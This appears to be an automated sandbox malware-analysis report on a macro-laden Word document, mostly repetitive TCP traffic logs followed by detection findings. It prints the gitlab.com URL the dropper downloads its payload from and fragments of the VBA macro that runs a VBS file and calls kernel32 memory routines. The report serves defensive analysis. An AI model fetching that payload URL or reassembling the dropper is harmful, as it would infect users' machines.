Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 172.65.251.78:443

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 172.65.251.78:443 -> 192.168.2.5:49718
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 172.65.251.78 443Jump to behavior
Source: global trafficTCP traffic: 192.168.2.5:53883 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /app8490744/updatesa/-/raw/main/up HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /app8490744/updatesa/-/raw/main/up HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: gitlab.com
Source: wscript.exe, WindowServices.vbs.0.drString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/up
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.5:49718 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\up[1].txt, type: DROPPEDMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Document contains an embedded VBA macro which may execute processes
Source: 0dsIoO7xjt.docxOLE, VBA macro line: shell.Run """" & vbsFilePath & """", 1, True
Source: ~WRD0000.tmp.0.drOLE, VBA macro line: shell.Run """" & vbsFilePath & """", 1, True
Document contains an embedded VBA macro with suspicious strings
Source: 0dsIoO7xjt.docxOLE, VBA macro line: CallByName kakensooe, methodName, VbMethod
Source: 0dsIoO7xjt.docxOLE, VBA macro line: Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: 0dsIoO7xjt.docxOLE, VBA macro line: Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: 0dsIoO7xjt.docxOLE, VBA macro line: Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: 0dsIoO7xjt.docxOLE, VBA macro line: Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
